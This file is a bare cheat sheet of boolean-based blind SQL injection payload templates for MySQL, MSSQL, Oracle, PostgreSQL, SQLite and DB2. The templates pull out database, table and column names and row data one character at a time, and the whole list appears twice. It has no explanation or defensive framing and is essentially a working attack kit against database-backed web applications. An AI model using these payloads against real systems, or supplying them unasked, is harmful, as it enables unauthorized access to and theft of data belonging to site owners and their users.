-- MySQL
-- 1-1) Database Name:
1 AND CASE WHEN (SUBSTRING(DATABASE(), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 1-2) Table Name:
1 AND CASE WHEN (SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {index},1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 1-3) Column Name:
1 AND CASE WHEN (SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' LIMIT {index},1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 1-4) Column Data:
1 AND CASE WHEN (SUBSTRING((SELECT {column_name} FROM {table_name} LIMIT {index},1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 1-5) IF (MySQL only)
-- Database Name:
1 AND IF(SUBSTRING(DATABASE(), {i}, 1) = '{char}', 1, 0) = 1 --

-- Table Name:
1 AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {index},1), {i}, 1) = '{char}', 1, 0) = 1 --

-- Column Name:
1 AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' LIMIT {index},1), {i}, 1) = '{char}', 1, 0) = 1 --

-- Column Data:
1 AND IF(SUBSTRING((SELECT {column_name} FROM {table_name} LIMIT {index},1), {i}, 1) = '{char}', 1, 0) = 1 --

-- 1-6) AND EXISTS
-- Database Name:
1 AND EXISTS(SELECT 1 FROM information_schema.schemata WHERE SCHEMA_NAME = DATABASE() AND SUBSTRING(SCHEMA_NAME, {i}, 1) = '{char}') --

-- Table Name:
1 AND EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema=DATABASE() AND table_name = (SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {index},1) AND SUBSTRING(table_name, {i}, 1) = '{char}') --

-- Column Name:
1 AND EXISTS(SELECT 1 FROM information_schema.columns WHERE table_name='{table_name}' AND column_name = (SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' LIMIT {index},1) AND SUBSTRING(column_name, {i}, 1) = '{char}') --

-- Column Data:
1 AND EXISTS(SELECT 1 FROM {table_name} WHERE SUBSTRING({column_name}, {i}, 1) = '{char}') --


-- Microsoft SQL Server (MSSQL)
-- 2-1) Database Name:
1 AND CASE WHEN (SUBSTRING(DB_NAME(), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 2-2) Table Name:
1 AND CASE WHEN (SUBSTRING((SELECT name FROM sys.tables ORDER BY name OFFSET {index} ROWS FETCH NEXT 1 ROWS ONLY), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 2-3) Column Name:
1 AND CASE WHEN (SUBSTRING((SELECT name FROM sys.columns WHERE object_id=OBJECT_ID('{table_name}') ORDER BY column_id OFFSET {index} ROWS FETCH NEXT 1 ROWS ONLY), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 2-4) Column Data:
1 AND CASE WHEN (SUBSTRING((SELECT TOP 1 {column_name} FROM {table_name} ORDER BY {column_name} OFFSET {index} ROWS), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --


-- Oracle
-- 3-1) Database Name:
1 AND CASE WHEN (SUBSTR((SELECT sys_context('userenv','db_name') FROM dual), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 3-2) Table Name:
1 AND CASE WHEN (SUBSTR((SELECT table_name FROM (SELECT table_name, ROWNUM AS rn FROM all_tables WHERE owner=USER) WHERE rn={index}), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 3-3) Column Name:
1 AND CASE WHEN (SUBSTR((SELECT column_name FROM (SELECT column_name, ROWNUM AS rn FROM all_tab_columns WHERE table_name=UPPER('{table_name}')) WHERE rn={index}), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 3-4) Column Data:
1 AND CASE WHEN (SUBSTR((SELECT {column_name} FROM (SELECT {column_name}, ROWNUM AS rn FROM {table_name}) WHERE rn={index}), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --


-- PostgreSQL
-- 4-1) Database Name:
1 AND CASE WHEN (SUBSTRING((SELECT current_database()), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 4-2) Table Name:
1 AND CASE WHEN (SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='public' OFFSET {index} LIMIT 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 4-3) Column Name:
1 AND CASE WHEN (SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' OFFSET {index} LIMIT 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 4-4) Column Data:
1 AND CASE WHEN (SUBSTRING((SELECT {column_name} FROM {table_name} OFFSET {index} LIMIT 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --


-- SQLite
-- 5-1) Database Name:
1 AND CASE WHEN (SUBSTR((SELECT name FROM sqlite_master WHERE type='database' LIMIT 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 5-2) Table Name:
1 AND CASE WHEN (SUBSTR((SELECT name FROM sqlite_master WHERE type='table' LIMIT {index}, 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 5-3) Column Name:
1 AND CASE WHEN (SUBSTR((SELECT name FROM pragma_table_info('{table_name}') LIMIT {index}, 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 5-4) Column Data:
1 AND CASE WHEN (SUBSTR((SELECT {column_name} FROM {table_name} LIMIT {index}, 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --


-- DB2
-- 6-1) Database Name:
1 AND CASE WHEN (SUBSTR((SELECT CURRENT SERVER FROM sysibm.sysdummy1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 6-2) Table Name:
1 AND CASE WHEN (SUBSTR((SELECT tabname FROM syscat.tables WHERE tabschema=current_schema ORDER BY tabname OFFSET {index} ROWS FETCH FIRST 1 ROWS ONLY), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 6-3) Column Name:
1 AND CASE WHEN (SUBSTR((SELECT colname FROM syscat.columns WHERE tabname='{table_name}' ORDER BY colname OFFSET {index} ROWS FETCH FIRST 1 ROWS ONLY), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 6-4) Column Data:
1 AND CASE WHEN (SUBSTR((SELECT {column_name} FROM {table_name} ORDER BY {column_name} OFFSET {index} ROWS FETCH FIRST 1 ROWS ONLY), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --





-- MySQL
-- 1-1) Database Name:
1 AND CASE WHEN (SUBSTRING(DATABASE(), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 1-2) Table Name:
1 AND CASE WHEN (SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {index},1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 1-3) Column Name:
1 AND CASE WHEN (SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' LIMIT {index},1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 1-4) Column Data:
1 AND CASE WHEN (SUBSTRING((SELECT {column_name} FROM {table_name} LIMIT {index},1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 1-5) IF (MySQL only)
-- Database Name:
1 AND IF(SUBSTRING(DATABASE(), {i}, 1) = '{char}', 1, 0) = 1 --

-- Table Name:
1 AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {index},1), {i}, 1) = '{char}', 1, 0) = 1 --

-- Column Name:
1 AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' LIMIT {index},1), {i}, 1) = '{char}', 1, 0) = 1 --

-- Column Data:
1 AND IF(SUBSTRING((SELECT {column_name} FROM {table_name} LIMIT {index},1), {i}, 1) = '{char}', 1, 0) = 1 --

-- 1-6) AND EXISTS
-- Database Name:
1 AND EXISTS(SELECT 1 FROM information_schema.schemata WHERE SCHEMA_NAME = DATABASE() AND SUBSTRING(SCHEMA_NAME, {i}, 1) = '{char}') --

-- Table Name:
1 AND EXISTS(SELECT 1 FROM information_schema.tables WHERE table_schema=DATABASE() AND table_name = (SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT {index},1) AND SUBSTRING(table_name, {i}, 1) = '{char}') --

-- Column Name:
1 AND EXISTS(SELECT 1 FROM information_schema.columns WHERE table_name='{table_name}' AND column_name = (SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' LIMIT {index},1) AND SUBSTRING(column_name, {i}, 1) = '{char}') --

-- Column Data:
1 AND EXISTS(SELECT 1 FROM {table_name} WHERE SUBSTRING({column_name}, {i}, 1) = '{char}') --


-- Microsoft SQL Server (MSSQL)
-- 2-1) Database Name:
1 AND CASE WHEN (SUBSTRING(DB_NAME(), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 2-2) Table Name:
1 AND CASE WHEN (SUBSTRING((SELECT name FROM sys.tables ORDER BY name OFFSET {index} ROWS FETCH NEXT 1 ROWS ONLY), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 2-3) Column Name:
1 AND CASE WHEN (SUBSTRING((SELECT name FROM sys.columns WHERE object_id=OBJECT_ID('{table_name}') ORDER BY column_id OFFSET {index} ROWS FETCH NEXT 1 ROWS ONLY), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 2-4) Column Data:
1 AND CASE WHEN (SUBSTRING((SELECT TOP 1 {column_name} FROM {table_name} ORDER BY {column_name} OFFSET {index} ROWS), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --


-- Oracle
-- 3-1) Database Name:
1 AND CASE WHEN (SUBSTR((SELECT sys_context('userenv','db_name') FROM dual), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 3-2) Table Name:
1 AND CASE WHEN (SUBSTR((SELECT table_name FROM (SELECT table_name, ROWNUM AS rn FROM all_tables WHERE owner=USER) WHERE rn={index}), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 3-3) Column Name:
1 AND CASE WHEN (SUBSTR((SELECT column_name FROM (SELECT column_name, ROWNUM AS rn FROM all_tab_columns WHERE table_name=UPPER('{table_name}')) WHERE rn={index}), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 3-4) Column Data:
1 AND CASE WHEN (SUBSTR((SELECT {column_name} FROM (SELECT {column_name}, ROWNUM AS rn FROM {table_name}) WHERE rn={index}), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --


-- PostgreSQL
-- 4-1) Database Name:
1 AND CASE WHEN (SUBSTRING((SELECT current_database()), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 4-2) Table Name:
1 AND CASE WHEN (SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='public' OFFSET {index} LIMIT 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 4-3) Column Name:
1 AND CASE WHEN (SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' OFFSET {index} LIMIT 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 4-4) Column Data:
1 AND CASE WHEN (SUBSTRING((SELECT {column_name} FROM {table_name} OFFSET {index} LIMIT 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --


-- SQLite
-- 5-1) Database Name:
1 AND CASE WHEN (SUBSTR((SELECT name FROM sqlite_master WHERE type='database' LIMIT 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 5-2) Table Name:
1 AND CASE WHEN (SUBSTR((SELECT name FROM sqlite_master WHERE type='table' LIMIT {index}, 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 5-3) Column Name:
1 AND CASE WHEN (SUBSTR((SELECT name FROM pragma_table_info('{table_name}') LIMIT {index}, 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 5-4) Column Data:
1 AND CASE WHEN (SUBSTR((SELECT {column_name} FROM {table_name} LIMIT {index}, 1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --


-- DB2
-- 6-1) Database Name:
1 AND CASE WHEN (SUBSTR((SELECT CURRENT SERVER FROM sysibm.sysdummy1), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 6-2) Table Name:
1 AND CASE WHEN (SUBSTR((SELECT tabname FROM syscat.tables WHERE tabschema=current_schema ORDER BY tabname OFFSET {index} ROWS FETCH FIRST 1 ROWS ONLY), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 6-3) Column Name:
1 AND CASE WHEN (SUBSTR((SELECT colname FROM syscat.columns WHERE tabname='{table_name}' ORDER BY colname OFFSET {index} ROWS FETCH FIRST 1 ROWS ONLY), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --

-- 6-4) Column Data:
1 AND CASE WHEN (SUBSTR((SELECT {column_name} FROM {table_name} ORDER BY {column_name} OFFSET {index} ROWS FETCH FIRST 1 ROWS ONLY), {i}, 1) = '{char}') THEN 1 ELSE 0 END = 1 --
